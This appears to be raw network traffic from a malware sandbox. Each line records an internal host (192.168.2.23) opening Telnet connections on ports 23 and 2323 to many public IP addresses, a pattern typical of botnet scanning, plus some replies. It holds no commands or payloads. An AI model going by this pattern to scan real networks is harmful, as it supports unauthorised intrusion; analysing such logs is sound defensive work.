                                                                        Dec 6, 2024 00:37:22.880592108 CET4197323192.168.2.2320.62.11.247
                                                                        Dec 6, 2024 00:37:22.880618095 CET4197323192.168.2.2343.89.85.43
                                                                        Dec 6, 2024 00:37:22.880618095 CET4197323192.168.2.2376.134.36.235
                                                                        Dec 6, 2024 00:37:22.880635023 CET4197323192.168.2.23174.136.130.250
                                                                        Dec 6, 2024 00:37:22.880631924 CET4197323192.168.2.23155.224.187.255
                                                                        Dec 6, 2024 00:37:22.880631924 CET419732323192.168.2.23170.227.12.151
                                                                        Dec 6, 2024 00:37:22.880637884 CET4197323192.168.2.23157.105.101.151
                                                                        Dec 6, 2024 00:37:22.880655050 CET4197323192.168.2.23173.192.5.154
                                                                        Dec 6, 2024 00:37:22.880656004 CET4197323192.168.2.23216.20.214.168
                                                                        Dec 6, 2024 00:37:22.880671978 CET4197323192.168.2.23135.9.224.140
                                                                        Dec 6, 2024 00:37:22.880680084 CET4197323192.168.2.2363.42.41.28
                                                                        Dec 6, 2024 00:37:22.880688906 CET4197323192.168.2.2317.6.132.192
                                                                        Dec 6, 2024 00:37:22.880708933 CET4197323192.168.2.2376.80.198.199
                                                                        Dec 6, 2024 00:37:22.880713940 CET4197323192.168.2.2354.50.224.144
                                                                        Dec 6, 2024 00:37:22.880717993 CET4197323192.168.2.23110.96.2.17
                                                                        Dec 6, 2024 00:37:22.880733013 CET419732323192.168.2.23209.5.64.74
                                                                        Dec 6, 2024 00:37:22.880733013 CET4197323192.168.2.2394.125.222.167
                                                                        Dec 6, 2024 00:37:22.880753040 CET4197323192.168.2.2379.91.235.214
                                                                        Dec 6, 2024 00:37:22.880755901 CET4197323192.168.2.2389.89.71.198
                                                                        Dec 6, 2024 00:37:22.880765915 CET4197323192.168.2.23194.148.14.162
                                                                        Dec 6, 2024 00:37:22.880781889 CET4197323192.168.2.2347.177.221.251
                                                                        Dec 6, 2024 00:37:22.880781889 CET4197323192.168.2.23149.78.243.33
                                                                        Dec 6, 2024 00:37:22.880789995 CET4197323192.168.2.23203.110.51.173
                                                                        Dec 6, 2024 00:37:22.880803108 CET4197323192.168.2.23142.7.99.250
                                                                        Dec 6, 2024 00:37:22.880804062 CET4197323192.168.2.2383.209.93.10
                                                                        Dec 6, 2024 00:37:22.880805016 CET4197323192.168.2.2386.142.19.130
                                                                        Dec 6, 2024 00:37:22.880805969 CET419732323192.168.2.2371.189.142.238
                                                                        Dec 6, 2024 00:37:22.880814075 CET4197323192.168.2.23152.24.54.128
                                                                        Dec 6, 2024 00:37:22.880839109 CET4197323192.168.2.23120.115.226.83
                                                                        Dec 6, 2024 00:37:22.880840063 CET4197323192.168.2.23141.25.196.136
                                                                        Dec 6, 2024 00:37:22.880846024 CET4197323192.168.2.23174.228.91.80
                                                                        Dec 6, 2024 00:37:22.880857944 CET4197323192.168.2.23146.224.22.169
                                                                        Dec 6, 2024 00:37:22.880857944 CET4197323192.168.2.2368.88.177.169
                                                                        Dec 6, 2024 00:37:22.880861998 CET4197323192.168.2.2313.107.185.39
                                                                        Dec 6, 2024 00:37:22.880892992 CET4197323192.168.2.23115.104.35.241
                                                                        Dec 6, 2024 00:37:22.880893946 CET4197323192.168.2.2372.157.124.140
                                                                        Dec 6, 2024 00:37:22.880903006 CET419732323192.168.2.2348.181.165.209
                                                                        Dec 6, 2024 00:37:22.880919933 CET4197323192.168.2.23197.148.44.245
                                                                        Dec 6, 2024 00:37:22.880935907 CET4197323192.168.2.23182.156.165.26
                                                                        Dec 6, 2024 00:37:22.880937099 CET4197323192.168.2.23102.100.59.136
                                                                        Dec 6, 2024 00:37:22.880938053 CET4197323192.168.2.2377.116.56.164
                                                                        Dec 6, 2024 00:37:22.880944014 CET4197323192.168.2.23203.14.167.75
                                                                        Dec 6, 2024 00:37:22.880954027 CET4197323192.168.2.23145.36.245.21
                                                                        Dec 6, 2024 00:37:22.880964994 CET4197323192.168.2.23176.186.193.68
                                                                        Dec 6, 2024 00:37:22.880984068 CET419732323192.168.2.23125.21.144.253
                                                                        Dec 6, 2024 00:37:22.880985022 CET4197323192.168.2.2367.9.247.207
                                                                        Dec 6, 2024 00:37:22.880989075 CET4197323192.168.2.2391.95.209.131
                                                                        Dec 6, 2024 00:37:22.880989075 CET4197323192.168.2.2392.221.203.15
                                                                        Dec 6, 2024 00:37:22.880996943 CET4197323192.168.2.2376.71.190.202
                                                                        Dec 6, 2024 00:37:22.881005049 CET4197323192.168.2.2348.162.72.148
                                                                        Dec 6, 2024 00:37:22.881019115 CET4197323192.168.2.23190.179.33.208
                                                                        Dec 6, 2024 00:37:22.881021976 CET4197323192.168.2.2344.30.139.13
                                                                        Dec 6, 2024 00:37:22.881023884 CET4197323192.168.2.2398.154.157.232
                                                                        Dec 6, 2024 00:37:22.881045103 CET4197323192.168.2.23202.36.126.205
                                                                        Dec 6, 2024 00:37:22.881055117 CET4197323192.168.2.2344.163.172.14
                                                                        Dec 6, 2024 00:37:22.881061077 CET4197323192.168.2.23188.5.72.159
                                                                        Dec 6, 2024 00:37:22.881061077 CET419732323192.168.2.2399.57.37.160
                                                                        Dec 6, 2024 00:37:22.881078959 CET4197323192.168.2.23103.228.113.79
                                                                        Dec 6, 2024 00:37:22.881082058 CET4197323192.168.2.23167.11.169.36
                                                                        Dec 6, 2024 00:37:22.881082058 CET4197323192.168.2.23122.252.158.89
                                                                        Dec 6, 2024 00:37:22.881098032 CET4197323192.168.2.23147.228.26.66
                                                                        Dec 6, 2024 00:37:22.881098032 CET4197323192.168.2.2391.20.33.232
                                                                        Dec 6, 2024 00:37:22.881109953 CET4197323192.168.2.2376.167.16.188
                                                                        Dec 6, 2024 00:37:22.881145954 CET419732323192.168.2.2318.161.75.27
                                                                        Dec 6, 2024 00:37:22.881151915 CET4197323192.168.2.2347.124.209.8
                                                                        Dec 6, 2024 00:37:22.881154060 CET4197323192.168.2.2327.119.236.189
                                                                        Dec 6, 2024 00:37:22.881155968 CET4197323192.168.2.23194.183.97.71
                                                                        Dec 6, 2024 00:37:22.881158113 CET4197323192.168.2.23117.226.56.129
                                                                        Dec 6, 2024 00:37:22.881158113 CET4197323192.168.2.2384.187.59.136
                                                                        Dec 6, 2024 00:37:22.881165028 CET4197323192.168.2.23108.39.29.244
                                                                        Dec 6, 2024 00:37:22.881166935 CET4197323192.168.2.23160.18.122.238
                                                                        Dec 6, 2024 00:37:22.881169081 CET4197323192.168.2.2354.61.129.195
                                                                        Dec 6, 2024 00:37:22.881185055 CET4197323192.168.2.23213.5.67.181
                                                                        Dec 6, 2024 00:37:22.881186962 CET4197323192.168.2.2317.88.12.253
                                                                        Dec 6, 2024 00:37:22.881198883 CET4197323192.168.2.23201.175.165.36
                                                                        Dec 6, 2024 00:37:22.881205082 CET4197323192.168.2.23206.224.248.44
                                                                        Dec 6, 2024 00:37:22.881207943 CET419732323192.168.2.2334.9.250.181
                                                                        Dec 6, 2024 00:37:22.881216049 CET4197323192.168.2.23151.9.216.101
                                                                        Dec 6, 2024 00:37:22.881247044 CET4197323192.168.2.2319.236.190.91
                                                                        Dec 6, 2024 00:37:22.881269932 CET4197323192.168.2.23192.255.220.170
                                                                        Dec 6, 2024 00:37:22.881270885 CET4197323192.168.2.2318.67.220.18
                                                                        Dec 6, 2024 00:37:22.881285906 CET4197323192.168.2.23124.54.226.38
                                                                        Dec 6, 2024 00:37:22.881287098 CET4197323192.168.2.23178.237.20.115
                                                                        Dec 6, 2024 00:37:22.881287098 CET4197323192.168.2.23153.205.146.118
                                                                        Dec 6, 2024 00:37:22.881295919 CET4197323192.168.2.23122.119.164.39
                                                                        Dec 6, 2024 00:37:22.881302118 CET4197323192.168.2.23109.40.247.122
                                                                        Dec 6, 2024 00:37:22.881318092 CET419732323192.168.2.23189.52.7.192
                                                                        Dec 6, 2024 00:37:22.881319046 CET4197323192.168.2.23171.146.4.234
                                                                        Dec 6, 2024 00:37:22.881323099 CET4197323192.168.2.2345.181.172.147
                                                                        Dec 6, 2024 00:37:22.881339073 CET4197323192.168.2.2383.255.235.99
                                                                        Dec 6, 2024 00:37:22.881350994 CET4197323192.168.2.23100.209.245.46
                                                                        Dec 6, 2024 00:37:22.881350994 CET4197323192.168.2.23106.120.143.70
                                                                        Dec 6, 2024 00:37:22.881369114 CET4197323192.168.2.23181.109.141.82
                                                                        Dec 6, 2024 00:37:22.881369114 CET4197323192.168.2.23158.210.115.228
                                                                        Dec 6, 2024 00:37:22.881381035 CET4197323192.168.2.23194.137.163.252
                                                                        Dec 6, 2024 00:37:22.881382942 CET4197323192.168.2.23218.249.234.38
                                                                        Dec 6, 2024 00:37:22.881395102 CET419732323192.168.2.2379.149.213.37
                                                                        Dec 6, 2024 00:37:22.881401062 CET4197323192.168.2.2376.101.18.213
                                                                        Dec 6, 2024 00:37:22.881403923 CET4197323192.168.2.23206.239.105.65
                                                                        Dec 6, 2024 00:37:22.881407976 CET4197323192.168.2.2341.222.120.202
                                                                        Dec 6, 2024 00:37:22.881427050 CET4197323192.168.2.235.13.196.76
                                                                        Dec 6, 2024 00:37:22.881443024 CET4197323192.168.2.23133.158.67.168
                                                                        Dec 6, 2024 00:37:22.881443977 CET4197323192.168.2.2323.199.225.238
                                                                        Dec 6, 2024 00:37:22.881443977 CET419732323192.168.2.23159.21.117.104
                                                                        Dec 6, 2024 00:37:22.881445885 CET4197323192.168.2.2396.23.204.6
                                                                        Dec 6, 2024 00:37:22.881445885 CET4197323192.168.2.2383.61.32.192
                                                                        Dec 6, 2024 00:37:22.881448984 CET4197323192.168.2.2366.211.26.69
                                                                        Dec 6, 2024 00:37:22.881449938 CET4197323192.168.2.2327.59.31.242
                                                                        Dec 6, 2024 00:37:22.881469011 CET4197323192.168.2.2398.51.2.87
                                                                        Dec 6, 2024 00:37:22.881484032 CET4197323192.168.2.23216.18.101.94
                                                                        Dec 6, 2024 00:37:22.881484032 CET4197323192.168.2.239.52.8.107
                                                                        Dec 6, 2024 00:37:22.881490946 CET4197323192.168.2.2341.220.204.208
                                                                        Dec 6, 2024 00:37:22.881490946 CET4197323192.168.2.2339.246.45.114
                                                                        Dec 6, 2024 00:37:22.881494045 CET4197323192.168.2.23126.64.236.115
                                                                        Dec 6, 2024 00:37:22.881506920 CET4197323192.168.2.23108.42.219.196
                                                                        Dec 6, 2024 00:37:22.881511927 CET4197323192.168.2.23156.72.159.248
                                                                        Dec 6, 2024 00:37:22.881511927 CET419732323192.168.2.23124.103.168.175
                                                                        Dec 6, 2024 00:37:22.881511927 CET4197323192.168.2.2380.231.186.133
                                                                        Dec 6, 2024 00:37:22.881515026 CET4197323192.168.2.23217.146.171.112
                                                                        Dec 6, 2024 00:37:22.881536007 CET419731023192.168.2.23193.166.113.65
                                                                        Dec 6, 2024 00:37:22.881537914 CET4197323192.168.2.23210.146.183.152
                                                                        Dec 6, 2024 00:37:22.881537914 CET4197323192.168.2.23204.99.115.189
                                                                        Dec 6, 2024 00:37:22.881542921 CET4197323192.168.2.2390.51.172.63
                                                                        Dec 6, 2024 00:37:22.881553888 CET4197323192.168.2.23219.3.154.143
                                                                        Dec 6, 2024 00:37:22.881567955 CET4197323192.168.2.2365.132.62.196
                                                                        Dec 6, 2024 00:37:22.881572962 CET419732323192.168.2.23130.13.92.117
                                                                        Dec 6, 2024 00:37:22.881586075 CET4197323192.168.2.23159.223.83.126
                                                                        Dec 6, 2024 00:37:22.881587029 CET4197323192.168.2.23128.34.252.184
                                                                        Dec 6, 2024 00:37:22.881588936 CET4197323192.168.2.2327.242.164.40
                                                                        Dec 6, 2024 00:37:22.881596088 CET4197323192.168.2.23145.236.127.246
                                                                        Dec 6, 2024 00:37:22.881617069 CET4197323192.168.2.235.128.113.120
                                                                        Dec 6, 2024 00:37:22.881632090 CET4197323192.168.2.23156.78.187.60
                                                                        Dec 6, 2024 00:37:22.881632090 CET4197323192.168.2.23192.219.7.195
                                                                        Dec 6, 2024 00:37:22.881633997 CET4197323192.168.2.2395.109.180.166
                                                                        Dec 6, 2024 00:37:22.881633997 CET4197323192.168.2.23171.17.193.250
                                                                        Dec 6, 2024 00:37:22.881634951 CET4197323192.168.2.2386.184.162.28
                                                                        Dec 6, 2024 00:37:22.881648064 CET419732323192.168.2.2313.106.10.177
                                                                        Dec 6, 2024 00:37:22.881652117 CET4197323192.168.2.2394.4.119.179
                                                                        Dec 6, 2024 00:37:22.881652117 CET4197323192.168.2.23216.128.210.110
                                                                        Dec 6, 2024 00:37:22.881666899 CET4197323192.168.2.23101.12.5.210
                                                                        Dec 6, 2024 00:37:22.881669044 CET4197323192.168.2.2377.48.173.124
                                                                        Dec 6, 2024 00:37:22.881669998 CET4197323192.168.2.2399.143.1.44
                                                                        Dec 6, 2024 00:37:22.881683111 CET4197323192.168.2.23123.96.99.195
                                                                        Dec 6, 2024 00:37:22.881683111 CET4197323192.168.2.2334.146.221.234
                                                                        Dec 6, 2024 00:37:22.881683111 CET4197323192.168.2.2372.156.20.100
                                                                        Dec 6, 2024 00:37:22.881689072 CET4197323192.168.2.23151.97.123.211
                                                                        Dec 6, 2024 00:37:22.881705046 CET4197323192.168.2.23181.244.105.172
                                                                        Dec 6, 2024 00:37:22.881709099 CET4197323192.168.2.2344.106.176.59
                                                                        Dec 6, 2024 00:37:22.881710052 CET419732323192.168.2.232.102.76.89
                                                                        Dec 6, 2024 00:37:22.881715059 CET4197323192.168.2.2395.131.91.49
                                                                        Dec 6, 2024 00:37:22.881727934 CET4197323192.168.2.23105.218.182.236
                                                                        Dec 6, 2024 00:37:22.881740093 CET4197323192.168.2.238.172.180.174
                                                                        Dec 6, 2024 00:37:22.881740093 CET4197323192.168.2.23141.10.63.193
                                                                        Dec 6, 2024 00:37:22.881740093 CET4197323192.168.2.2363.175.142.107
                                                                        Dec 6, 2024 00:37:22.881743908 CET4197323192.168.2.23176.104.24.77
                                                                        Dec 6, 2024 00:37:22.881764889 CET4197323192.168.2.23153.229.103.121
                                                                        Dec 6, 2024 00:37:23.000952005 CET234197342.46.101.146192.168.2.23
                                                                        Dec 6, 2024 00:37:23.000967979 CET102341973103.39.153.43192.168.2.23
                                                                        Dec 6, 2024 00:37:23.000981092 CET2341973201.133.132.19192.168.2.23
                                                                        Dec 6, 2024 00:37:23.000993013 CET2341973169.189.55.16192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001004934 CET234197376.134.36.235192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001028061 CET4197323192.168.2.2342.46.101.146
                                                                        Dec 6, 2024 00:37:23.001036882 CET419731023192.168.2.23103.39.153.43
                                                                        Dec 6, 2024 00:37:23.001063108 CET4197323192.168.2.23201.133.132.19
                                                                        Dec 6, 2024 00:37:23.001063108 CET4197323192.168.2.23169.189.55.16
                                                                        Dec 6, 2024 00:37:23.001065016 CET4197323192.168.2.2376.134.36.235
                                                                        Dec 6, 2024 00:37:23.001127958 CET234197343.89.85.43192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001153946 CET234197320.62.11.247192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001167059 CET4197323192.168.2.2343.89.85.43
                                                                        Dec 6, 2024 00:37:23.001168013 CET2341973174.136.130.250192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001178980 CET2341973155.224.187.255192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001188040 CET232341973170.227.12.151192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001199007 CET2341973157.105.101.151192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001202106 CET4197323192.168.2.2320.62.11.247
                                                                        Dec 6, 2024 00:37:23.001210928 CET2341973173.192.5.154192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001213074 CET4197323192.168.2.23174.136.130.250
                                                                        Dec 6, 2024 00:37:23.001224995 CET2341973216.20.214.168192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001230001 CET4197323192.168.2.23155.224.187.255
                                                                        Dec 6, 2024 00:37:23.001230001 CET419732323192.168.2.23170.227.12.151
                                                                        Dec 6, 2024 00:37:23.001238108 CET2341973135.9.224.140192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001244068 CET4197323192.168.2.23157.105.101.151
                                                                        Dec 6, 2024 00:37:23.001247883 CET4197323192.168.2.23173.192.5.154
                                                                        Dec 6, 2024 00:37:23.001251936 CET234197363.42.41.28192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001264095 CET234197317.6.132.192192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001271009 CET234197376.80.198.199192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001271009 CET4197323192.168.2.23216.20.214.168
                                                                        Dec 6, 2024 00:37:23.001275063 CET4197323192.168.2.23135.9.224.140
                                                                        Dec 6, 2024 00:37:23.001283884 CET234197354.50.224.144192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001296043 CET2341973110.96.2.17192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001306057 CET232341973209.5.64.74192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001316071 CET234197394.125.222.167192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001329899 CET4197323192.168.2.2376.80.198.199
                                                                        Dec 6, 2024 00:37:23.001329899 CET4197323192.168.2.2317.6.132.192
                                                                        Dec 6, 2024 00:37:23.001331091 CET234197379.91.235.214192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001334906 CET4197323192.168.2.2354.50.224.144
                                                                        Dec 6, 2024 00:37:23.001339912 CET4197323192.168.2.2363.42.41.28
                                                                        Dec 6, 2024 00:37:23.001339912 CET4197323192.168.2.23110.96.2.17
                                                                        Dec 6, 2024 00:37:23.001339912 CET419732323192.168.2.23209.5.64.74
                                                                        Dec 6, 2024 00:37:23.001343966 CET234197389.89.71.198192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001357079 CET2341973194.148.14.162192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001360893 CET4197323192.168.2.2394.125.222.167
                                                                        Dec 6, 2024 00:37:23.001369953 CET234197347.177.221.251192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001372099 CET4197323192.168.2.2379.91.235.214
                                                                        Dec 6, 2024 00:37:23.001380920 CET2341973149.78.243.33192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001389980 CET4197323192.168.2.23194.148.14.162
                                                                        Dec 6, 2024 00:37:23.001389980 CET4197323192.168.2.2389.89.71.198
                                                                        Dec 6, 2024 00:37:23.001393080 CET2341973203.110.51.173192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001410007 CET2341973142.7.99.250192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001410961 CET4197323192.168.2.2347.177.221.251
                                                                        Dec 6, 2024 00:37:23.001410961 CET4197323192.168.2.23149.78.243.33
                                                                        Dec 6, 2024 00:37:23.001429081 CET4197323192.168.2.23203.110.51.173
                                                                        Dec 6, 2024 00:37:23.001430035 CET234197383.209.93.10192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001451969 CET4197323192.168.2.23142.7.99.250
                                                                        Dec 6, 2024 00:37:23.001457930 CET4197323192.168.2.2383.209.93.10
                                                                        Dec 6, 2024 00:37:23.001499891 CET234197386.142.19.130192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001511097 CET23234197371.189.142.238192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001519918 CET2341973152.24.54.128192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001548052 CET419732323192.168.2.2371.189.142.238
                                                                        Dec 6, 2024 00:37:23.001549006 CET4197323192.168.2.23152.24.54.128
                                                                        Dec 6, 2024 00:37:23.001550913 CET4197323192.168.2.2386.142.19.130
                                                                        Dec 6, 2024 00:37:23.001563072 CET2341973141.25.196.136192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001579046 CET2341973120.115.226.83192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001588106 CET2341973174.228.91.80192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001614094 CET4197323192.168.2.23120.115.226.83
                                                                        Dec 6, 2024 00:37:23.001614094 CET2341973146.224.22.169192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001614094 CET4197323192.168.2.23141.25.196.136
                                                                        Dec 6, 2024 00:37:23.001626968 CET234197313.107.185.39192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001629114 CET4197323192.168.2.23174.228.91.80
                                                                        Dec 6, 2024 00:37:23.001637936 CET234197368.88.177.169192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001648903 CET2341973115.104.35.241192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001657963 CET4197323192.168.2.2313.107.185.39
                                                                        Dec 6, 2024 00:37:23.001660109 CET4197323192.168.2.23146.224.22.169
                                                                        Dec 6, 2024 00:37:23.001673937 CET4197323192.168.2.2368.88.177.169
                                                                        Dec 6, 2024 00:37:23.001698017 CET4197323192.168.2.23115.104.35.241
                                                                        Dec 6, 2024 00:37:23.001718044 CET234197372.157.124.140192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001728058 CET23234197348.181.165.209192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001735926 CET2341973197.148.44.245192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001745939 CET2341973182.156.165.26192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001755953 CET419732323192.168.2.2348.181.165.209
                                                                        Dec 6, 2024 00:37:23.001755953 CET2341973102.100.59.136192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001769066 CET4197323192.168.2.2372.157.124.140
                                                                        Dec 6, 2024 00:37:23.001775980 CET4197323192.168.2.23197.148.44.245
                                                                        Dec 6, 2024 00:37:23.001780987 CET4197323192.168.2.23182.156.165.26
                                                                        Dec 6, 2024 00:37:23.001791000 CET234197377.116.56.164192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001802921 CET2341973203.14.167.75192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001802921 CET4197323192.168.2.23102.100.59.136
                                                                        Dec 6, 2024 00:37:23.001817942 CET2341973145.36.245.21192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001831055 CET2341973176.186.193.68192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001840115 CET4197323192.168.2.2377.116.56.164
                                                                        Dec 6, 2024 00:37:23.001852036 CET4197323192.168.2.23203.14.167.75
                                                                        Dec 6, 2024 00:37:23.001868963 CET4197323192.168.2.23176.186.193.68
                                                                        Dec 6, 2024 00:37:23.001871109 CET232341973125.21.144.253192.168.2.23
                                                                        Dec 6, 2024 00:37:23.001880884 CET4197323192.168.2.23145.36.245.21
                                                                        Dec 6, 2024 00:37:23.001908064 CET419732323192.168.2.23125.21.144.253
                                                                        Dec 6, 2024 00:37:23.004044056 CET234197367.9.247.207192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004055023 CET234197391.95.209.131192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004090071 CET4197323192.168.2.2367.9.247.207
                                                                        Dec 6, 2024 00:37:23.004096985 CET234197392.221.203.15192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004107952 CET234197376.71.190.202192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004112005 CET4197323192.168.2.2391.95.209.131
                                                                        Dec 6, 2024 00:37:23.004131079 CET234197348.162.72.148192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004137993 CET4197323192.168.2.2376.71.190.202
                                                                        Dec 6, 2024 00:37:23.004148006 CET2341973190.179.33.208192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004151106 CET4197323192.168.2.2392.221.203.15
                                                                        Dec 6, 2024 00:37:23.004167080 CET234197344.30.139.13192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004167080 CET4197323192.168.2.2348.162.72.148
                                                                        Dec 6, 2024 00:37:23.004185915 CET4197323192.168.2.23190.179.33.208
                                                                        Dec 6, 2024 00:37:23.004187107 CET234197398.154.157.232192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004198074 CET2341973202.36.126.205192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004200935 CET4197323192.168.2.2344.30.139.13
                                                                        Dec 6, 2024 00:37:23.004220009 CET4197323192.168.2.2398.154.157.232
                                                                        Dec 6, 2024 00:37:23.004230976 CET4197323192.168.2.23202.36.126.205
                                                                        Dec 6, 2024 00:37:23.004358053 CET234197344.163.172.14192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004369974 CET2341973188.5.72.159192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004390001 CET23234197399.57.37.160192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004400969 CET2341973103.228.113.79192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004400969 CET4197323192.168.2.2344.163.172.14
                                                                        Dec 6, 2024 00:37:23.004409075 CET4197323192.168.2.23188.5.72.159
                                                                        Dec 6, 2024 00:37:23.004414082 CET2341973167.11.169.36192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004427910 CET2341973122.252.158.89192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004439116 CET2341973147.228.26.66192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004451036 CET4197323192.168.2.23103.228.113.79
                                                                        Dec 6, 2024 00:37:23.004451990 CET234197391.20.33.232192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004457951 CET419732323192.168.2.2399.57.37.160
                                                                        Dec 6, 2024 00:37:23.004457951 CET4197323192.168.2.23122.252.158.89
                                                                        Dec 6, 2024 00:37:23.004467010 CET234197376.167.16.188192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004472971 CET4197323192.168.2.23147.228.26.66
                                                                        Dec 6, 2024 00:37:23.004478931 CET23234197318.161.75.27192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004491091 CET234197347.124.209.8192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004492998 CET4197323192.168.2.2391.20.33.232
                                                                        Dec 6, 2024 00:37:23.004498005 CET4197323192.168.2.23167.11.169.36
                                                                        Dec 6, 2024 00:37:23.004501104 CET4197323192.168.2.2376.167.16.188
                                                                        Dec 6, 2024 00:37:23.004503965 CET234197327.119.236.189192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004506111 CET419732323192.168.2.2318.161.75.27
                                                                        Dec 6, 2024 00:37:23.004514933 CET2341973194.183.97.71192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004528046 CET4197323192.168.2.2347.124.209.8
                                                                        Dec 6, 2024 00:37:23.004528999 CET2341973117.226.56.129192.168.2.23
                                                                        Dec 6, 2024 00:37:23.004534006 CET4197323192.168.2.2327.119.236.189
                                                                        Dec 6, 2024 00:37:23.004550934 CET4197323192.168.2.23194.183.97.71
                                                                        Dec 6, 2024 00:37:23.004600048 CET4197323192.168.2.23117.226.56.129
                                                                        Dec 6, 2024 00:37:23.005546093 CET234197384.187.59.136192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005564928 CET2341973108.39.29.244192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005584955 CET2341973160.18.122.238192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005601883 CET234197354.61.129.195192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005604029 CET4197323192.168.2.2384.187.59.136
                                                                        Dec 6, 2024 00:37:23.005604982 CET4197323192.168.2.23108.39.29.244
                                                                        Dec 6, 2024 00:37:23.005614042 CET2341973213.5.67.181192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005618095 CET4197323192.168.2.23160.18.122.238
                                                                        Dec 6, 2024 00:37:23.005640984 CET4197323192.168.2.2354.61.129.195
                                                                        Dec 6, 2024 00:37:23.005645037 CET4197323192.168.2.23213.5.67.181
                                                                        Dec 6, 2024 00:37:23.005645990 CET234197317.88.12.253192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005659103 CET2341973201.175.165.36192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005680084 CET4197323192.168.2.2317.88.12.253
                                                                        Dec 6, 2024 00:37:23.005685091 CET2341973206.224.248.44192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005692005 CET4197323192.168.2.23201.175.165.36
                                                                        Dec 6, 2024 00:37:23.005696058 CET23234197334.9.250.181192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005712986 CET2341973151.9.216.101192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005724907 CET234197319.236.190.91192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005728960 CET419732323192.168.2.2334.9.250.181
                                                                        Dec 6, 2024 00:37:23.005729914 CET4197323192.168.2.23206.224.248.44
                                                                        Dec 6, 2024 00:37:23.005738974 CET2341973192.255.220.170192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005740881 CET4197323192.168.2.23151.9.216.101
                                                                        Dec 6, 2024 00:37:23.005769014 CET4197323192.168.2.2319.236.190.91
                                                                        Dec 6, 2024 00:37:23.005772114 CET4197323192.168.2.23192.255.220.170
                                                                        Dec 6, 2024 00:37:23.005799055 CET234197318.67.220.18192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005810022 CET2341973124.54.226.38192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005819082 CET2341973178.237.20.115192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005831003 CET2341973153.205.146.118192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005840063 CET4197323192.168.2.2318.67.220.18
                                                                        Dec 6, 2024 00:37:23.005842924 CET2341973122.119.164.39192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005845070 CET4197323192.168.2.23124.54.226.38
                                                                        Dec 6, 2024 00:37:23.005856991 CET2341973109.40.247.122192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005867958 CET232341973189.52.7.192192.168.2.23
                                                                        Dec 6, 2024 00:37:23.005882978 CET4197323192.168.2.23122.119.164.39
